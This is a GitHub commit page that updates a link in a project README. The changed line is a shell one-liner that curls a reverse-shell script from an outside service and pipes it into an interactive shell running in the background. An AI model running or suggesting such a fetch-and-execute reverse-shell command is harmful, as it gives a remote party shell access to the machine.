Skip to content

Commit a37aa9d

Browse files
committed
Fix old link
1 parent 04789e6 commit a37aa9d

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

README.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -76,7 +76,7 @@ The following command will run the reverse shell in a background process and exi
7676
Make sure you run this in a fresh terminal window otherwise you'll lose any work in your existing session.
7777

7878
```shell
79-
sh -c "curl https://shell.now.sh/localhost:1337 | sh -i &" && exit
79+
sh -c "curl https://reverse-shell.sh/localhost:1337 | sh -i &" && exit
8080
```
8181

8282
## License

0 commit comments

Comments
 (0)